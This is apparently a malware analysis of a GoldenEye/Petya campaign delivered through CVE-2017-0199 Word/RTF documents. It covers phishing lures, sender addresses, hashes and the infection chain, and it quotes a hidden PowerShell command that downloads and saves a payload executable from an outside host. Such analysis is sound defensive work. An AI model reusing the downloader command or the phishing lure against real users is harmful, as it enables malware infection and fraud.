The initial delivery mechanism is an email that includes a malicious attachment. One of the attack vectors used is abusing HTA-Handlers.
CVE-2017-0199, a vulnerability in Microsoft Word that allows an attacker to execute a malicious Visual Basic script, uses a logic bug and bypasses most mitigations. Upon execution of the malicious script, it downloads and executes malicious payloads, as well as displays decoy documents to the user. The Microsoft Office RTF documents that leverage CVE-2017-0199 allows a malicious actor to download and execute a Visual Basic script containing specifically crafted PowerShell commands when a user opens a document containing an embedded exploit. These Office documents exploiting CVE-2017-0199 have been seen to download and execute malware payloads from different well-known malware families and GoldenEye/Petya, as some have called it, is doing the same.
Example Email for Delivery:
Some malicious addresses used to send email with the malicious DOC:
christagcimrl @ outlook.com
amparoy982wa @ outlook.com
The subjects in this case are created like (for target "target.emailName@targetDomain.com"):
You will be billed $ 2,273.42 on your Visa card momentarily.
Go through attachment to avoid it.
Password is ex. 6089, 6088
With appreciation! Prince
Attached file name: Scan_target.emailName.doc
A confirmed email address:
christian.malcharzik@gmail[.]com was found to send emails with the file "Order-20062017.doc" (MD5: 415FE69BF32634CA98FA07633F4118E1) as an attachment.
The attack occurs in the following manner:
- A threat actor will email a Microsoft Word document to a targeted user with an embedded link object.
- When the user opens the document, winword.exe issues a HTTP request to a remote server to retrieve a malicious HTA file.
- The file returned by the server is a fake RTF file with an embedded malicious script.
Then, Winword.exe looks up the file handler for application/hta through a COM object, which causes the Microsoft HTA application (mshta.exe) to load and execute the malicious script. Therefore, when the user opens the document (Order-20062017.doc) the file returned by the server is a fake RTF file with an embedded malicious script. The HTA application (mshta.exe) then loads and executes the malicious script (RTF) which has an obfuscated embedded script calling out to an IP address to continue the infection process.
Order of operations Simplified:
Order-20062017.doc (RTF) -> myguy.xls (HTA) -> myguy.exe ->
Using a python script (rtfdump.py) for dumping the contents of a rtf, we can extract the embedded link object from the sample (101cc1cb56c407d5b9149f2c3b8523350d23ba84-Order-20062017.doc).
Contents dumped contains this string (URL): "22.214.171.124/myguy.xls"
The file continues to be downloaded because of the known vulnerability CVE-2017-0199 that leverages and exploits Office Documents/RTF.
After the download, we have sample 736752744122a0b5ee4b95ddad634dd225dc0f73-myguy.xls. According to the description of the vulnerability CVE-2017-0199, Mshta.exe will parse the myguy.xls and find a script.
This xls contains the obfuscated script that will eventually execute a powershell command:
"PowerShell -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('hxxp://french-cooking.com/myguy.exe', 'C:\Documents and Settings\Administrator\Application Data\34212.exe');"
After successful execution of the powershell command the infection moves forward to download a file called “myguy exe”.
This sample has a hash of 9288fb8e96d419586fc8c595dd95353d48e8a060 and is essentially the downloader of the Petya DLL.
It used process hollowing and the significant APIs used were:
-ZwWriteVirtualMemory ***Seen below in OLLYBDG
Continuation and full technical analysis